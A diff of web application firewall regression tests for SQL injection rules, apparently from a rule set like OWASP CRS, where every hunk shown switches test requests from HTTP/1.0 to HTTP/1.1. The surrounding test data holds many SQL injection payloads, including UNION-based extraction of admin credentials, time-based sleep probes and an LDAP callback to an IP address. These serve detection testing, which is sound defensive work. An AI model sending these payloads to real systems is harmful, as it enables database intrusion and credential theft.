+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942340]
@@ -118,7 +118,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email='%20and%20email%20not%20similar%20to%20id--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942340]
@@ -135,7 +135,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email='%20or%20true;%20foo"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942340]
@@ -149,7 +149,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email='%20or%20false;%20foo"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942340]
@@ -166,7 +166,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email='||true"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942340]
@@ -183,7 +183,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email='ortrue"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942340]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml
index 7934f55fc..acf3e8352 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           # ; insert INTO table (word) VALUES('dfsd')
           uri: "/get?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942350]
@@ -33,7 +33,7 @@ tests:
           port: 80
           # ;insertion_424242
           uri: "/get?var=%3Binsertion_424242"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942350]
@@ -50,7 +50,7 @@ tests:
           port: 80
           # CREATE FUNCTION hello (s CHAR(20)) RETURNS CHAR(50) DETERMINISTIC RETURN CONCAT('Hello, ',s,'!');
           uri: "/get?var=CREATE+FUNCTION+hello+%28s+CHAR%2820%29%29+RETURNS+CHAR%2850%29+DETERMINISTIC+RETURN+CONCAT%28%27Hello%2C+%27%2Cs%2C%27%21%27%29%3B"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942350]
@@ -66,7 +66,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?test=;truncate[xx"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942350]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml
index 3631ba1b1..e3120c6e0 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml
@@ -17,7 +17,7 @@ tests:
           uri: "/post"
           # 23423 as "sdfsdfs" FROM table
           data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -34,7 +34,7 @@ tests:
           port: 80
           uri: "/post"
           data: "select Char("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -51,7 +51,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SELECT CHAR("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -68,7 +68,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SELECT GROUP_CONCAT("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -85,7 +85,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SELECT group_cOnCat("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -102,7 +102,7 @@ tests:
           port: 80
           uri: "/post"
           data: "select load_file("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -119,7 +119,7 @@ tests:
           port: 80
           uri: "/post"
           data: "` AS `edit_user_id` from"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -136,7 +136,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=%60+REGEXP%20"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -153,7 +153,7 @@ tests:
           port: 80
           uri: "/post"
           data: "` AS `OXTIMESTAMP` from"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -170,7 +170,7 @@ tests:
           port: 80
           uri: "/post"
           data: "(load_file("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -187,7 +187,7 @@ tests:
           port: 80
           uri: "/post"
           data: "` AS `documentType` FROM"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -204,7 +204,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SELECT load_file("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -221,7 +221,7 @@ tests:
           port: 80
           uri: "/post"
           data: "6 As\" from"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -238,7 +238,7 @@ tests:
           port: 80
           uri: "/post"
           data: ", aside from"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942360]
@@ -255,7 +255,7 @@ tests:
           port: 80
           uri: "/post"
           data: "a=/create"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942360]
@@ -272,7 +272,7 @@ tests:
           port: 80
           uri: "/post"
           data: "a=/CREATE TABLE Persons"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -289,7 +289,7 @@ tests:
           port: 80
           uri: "/post"
           data: " Delete (Trashcan)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942360]
@@ -306,7 +306,7 @@ tests:
           port: 80
           uri: "/post"
           data: "5desc"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942360]
@@ -323,7 +323,7 @@ tests:
           port: 80
           uri: "/post"
           data: "34-delete"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942360]
@@ -340,7 +340,7 @@ tests:
           port: 80
           uri: "/post"
           data: " update"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942360]
@@ -357,7 +357,7 @@ tests:
           port: 80
           uri: "/post"
           data: "/select-quote"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942360]
@@ -374,7 +374,7 @@ tests:
           port: 80
           uri: "/post"
           data: " Update: After..."
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942360]
@@ -391,7 +391,7 @@ tests:
           port: 80
           uri: "/post"
           data: "\"desc\""
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942360]
@@ -408,7 +408,7 @@ tests:
           port: 80
           uri: "/post"
           data: "a=/load.php"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942360]
@@ -425,7 +425,7 @@ tests:
           port: 80
           uri: "/post"
           data: "a=/update-assets"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942360]
@@ -442,7 +442,7 @@ tests:
           port: 80
           uri: "/post"
           data: "bla blabla live update chart"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942360]
@@ -459,7 +459,7 @@ tests:
           port: 80
           uri: "/post"
           data: ".select-gws-banana"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942360]
@@ -476,7 +476,7 @@ tests:
           port: 80
           uri: "/post"
           data: "blablabla. As evidence from the following blablabla"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942360]
@@ -493,7 +493,7 @@ tests:
           port: 80
           uri: "/post"
           data: "||(SELECT(DBMS_LDAP.INIT('169.1.1.1',19))FROM(DUAL))/investigate"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942360]
@@ -510,7 +510,7 @@ tests:
           port: 80
           uri: "/post"
           data: "'||(select(pg_sleep(15))where(true))||'/investigate"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942360]
@@ -527,7 +527,7 @@ tests:
           port: 80
           uri: "/post"
           data: "UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qqkjq','mxTSrPILRz'),'qvxvq')-- sqCV"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942360]
@@ -544,7 +544,7 @@ tests:
           port: 80
           uri: "/post"
           data: "2020-03-01 UNION ALL SELECT CONCAT"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -561,7 +561,7 @@ tests:
           port: 80
           uri: "/post"
           data: "x\"; SELECT LOAD_FILE('"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -578,7 +578,7 @@ tests:
           port: 80
           uri: "/post"
           data: "-1 UNION SELECT null,123456,null,null,null,null--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -595,7 +595,7 @@ tests:
           port: 80
           uri: "/post"
           data: "(CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6557=6557"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -612,7 +612,7 @@ tests:
           port: 80
           uri: "/post"
           data: ") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -629,7 +629,7 @@ tests:
           port: 80
           uri: "/post"
           data: "1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -646,7 +646,7 @@ tests:
           port: 80
           uri: "/post"
           data: "(SELECT 4440 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(4440=4440,1))),0x7170716271,FLOOR"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
@@ -663,7 +663,7 @@ tests:
           port: 80
           uri: "/post"
           data: "2759399466.1534185336 -6863 union all select 1,1,1,1,1,1,1,1,1,CONCAT"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942360]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml
index 259cc79ba..aa92985b3 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           uri: "/post"
           data: "'alter a"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942361]
@@ -33,7 +33,7 @@ tests:
           port: 80
           uri: "/post"
           data: "\" ALTER A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942361]
@@ -50,7 +50,7 @@ tests:
           port: 80
           uri: "/post"
           data: "'ALTER A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942361]
@@ -67,7 +67,7 @@ tests:
           port: 80
           uri: "/post"
           data: "' alter/"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942361]
@@ -84,7 +84,7 @@ tests:
           port: 80
           uri: "/post"
           data: "\" UNION A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942361]
@@ -101,7 +101,7 @@ tests:
           port: 80
           uri: "/post"
           data: "'UNION A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942361]
@@ -118,7 +118,7 @@ tests:
           port: 80
           uri: "/post"
           data: "' union/"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942361]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml
index 27c6d2d09..e05d12a64 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml
@@ -17,7 +17,7 @@ tests:
           uri: "/post"
           # 23423 as "sdfsdfs" FROM table
           data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -34,7 +34,7 @@ tests:
           port: 80
           uri: "/post"
           data: "select Char("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -51,7 +51,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SELECT CHAR("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -68,7 +68,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SELECT GROUP_CONCAT("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -85,7 +85,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SELECT group_cOnCat("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -102,7 +102,7 @@ tests:
           port: 80
           uri: "/post"
           data: ") as cc FROM"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -119,7 +119,7 @@ tests:
           port: 80
           uri: "/post"
           data: ") AS orders FROM"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -136,7 +136,7 @@ tests:
           port: 80
           uri: "/post"
           data: ") AS `carrier_id` from"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -153,7 +153,7 @@ tests:
           port: 80
           uri: "/post"
           data: "select load_file("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -170,7 +170,7 @@ tests:
           port: 80
           uri: "/post"
           data: ") AS Role FROM"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -187,7 +187,7 @@ tests:
           port: 80
           uri: "/post"
           data: "` AS `edit_user_id` from"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -204,7 +204,7 @@ tests:
           port: 80
           uri: "/post"
           data: ") AS val FROM"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -221,7 +221,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=%60+REGEXP%20"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -238,7 +238,7 @@ tests:
           port: 80
           uri: "/post"
           data: ") AS 'Durchschnitt_Importzeit' FROM"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -255,7 +255,7 @@ tests:
           port: 80
           uri: "/post"
           data: "` AS `OXTIMESTAMP` from"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -272,7 +272,7 @@ tests:
           port: 80
           uri: "/post"
           data: ") as col_0_0_ from"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -289,7 +289,7 @@ tests:
           port: 80
           uri: "/post"
           data: ") AS `count` FROM"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -306,7 +306,7 @@ tests:
           port: 80
           uri: "/post"
           data: ") AS schlagwoerter FROM"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -323,7 +323,7 @@ tests:
           port: 80
           uri: "/post"
           data: ") as User from"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -340,7 +340,7 @@ tests:
           port: 80
           uri: "/post"
           data: ") AS t FROM"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -357,7 +357,7 @@ tests:
           port: 80
           uri: "/post"
           data: "(load_file("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -374,7 +374,7 @@ tests:
           port: 80
           uri: "/post"
           data: ") as ExecuteTheseSQLCommands FROM"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -391,7 +391,7 @@ tests:
           port: 80
           uri: "/post"
           data: ")      AS schlagwoerter      FROM"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -408,7 +408,7 @@ tests:
           port: 80
           uri: "/post"
           data: "` AS `documentType` FROM"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -425,7 +425,7 @@ tests:
           port: 80
           uri: "/post"
           data: "! As' from"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -442,7 +442,7 @@ tests:
           port: 80
           uri: "/post"
           data: ";  As  not  from"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -459,7 +459,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SELECT load_file("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -476,7 +476,7 @@ tests:
           port: 80
           uri: "/post"
           data: "6 As\" from"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -493,7 +493,7 @@ tests:
           port: 80
           uri: "/post"
           data: ") as day1 FROM"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
@@ -510,7 +510,7 @@ tests:
           port: 80
           uri: "/post"
           data: ", aside from"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942362]
@@ -527,7 +527,7 @@ tests:
           port: 80
           uri: "/post"
           data: "a=/create"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942362]
@@ -544,7 +544,7 @@ tests:
           port: 80
           uri: "/post"
           data: "a=/CREATE TABLE Persons"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942362]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml
index 18ba3f0fa..3e663da21 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml
@@ -28,7 +28,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=' * from = 1 or '9"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942370]
@@ -46,7 +46,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=' * from = 1 id '9"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942370]
@@ -64,7 +64,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=' = # '"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942370]
@@ -82,7 +82,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=' ? # = #"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942370]
@@ -100,7 +100,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var='? # = --"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942370]
@@ -123,7 +123,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=' or homer 9"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942370]
@@ -141,7 +141,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=^'"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942370]
@@ -159,7 +159,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=\"` * 12344"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942370]
@@ -177,7 +177,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=>foo##'."
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942370]
@@ -192,7 +192,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942370]
@@ -208,7 +208,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942370]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml
index c3445da07..815d768b9 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           uri: "/post"
           data: "from `db_miwf`.`sys_refindex` limit"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -33,7 +33,7 @@ tests:
           port: 80
           uri: "/post"
           data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -50,7 +50,7 @@ tests:
           port: 80
           uri: "/post"
           data: "from `information_schema`.tables limit"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -67,7 +67,7 @@ tests:
           port: 80
           uri: "/post"
           data: "ORder by"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -84,7 +84,7 @@ tests:
           port: 80
           uri: "/post"
           data: "ordeR by"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -101,7 +101,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SELECT (CASE"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -118,7 +118,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -135,7 +135,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -152,7 +152,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -169,7 +169,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -186,7 +186,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -203,7 +203,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -220,7 +220,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -237,7 +237,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SELECT 'qzxjq'||(SELECT (CASE"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -254,7 +254,7 @@ tests:
           port: 80
           uri: "/post"
           data: "execute php"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -271,7 +271,7 @@ tests:
           port: 80
           uri: "/post"
           data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -288,7 +288,7 @@ tests:
           port: 80
           uri: "/post"
           data: "Execute("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -305,7 +305,7 @@ tests:
           port: 80
           uri: "/post"
           data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -322,7 +322,7 @@ tests:
           port: 80
           uri: "/post"
           data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -339,7 +339,7 @@ tests:
           port: 80
           uri: "/post"
           data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -356,7 +356,7 @@ tests:
           port: 80
           uri: "/post"
           data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -373,7 +373,7 @@ tests:
           port: 80
           uri: "/post"
           data: "HAVING+1%3D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -390,7 +390,7 @@ tests:
           port: 80
           uri: "/post"
           data: "execute+elysi"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -407,7 +407,7 @@ tests:
           port: 80
           uri: "/post"
           data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -424,7 +424,7 @@ tests:
           port: 80
           uri: "/post"
           data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -441,7 +441,7 @@ tests:
           port: 80
           uri: "/post"
           data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -458,7 +458,7 @@ tests:
           port: 80
           uri: "/post"
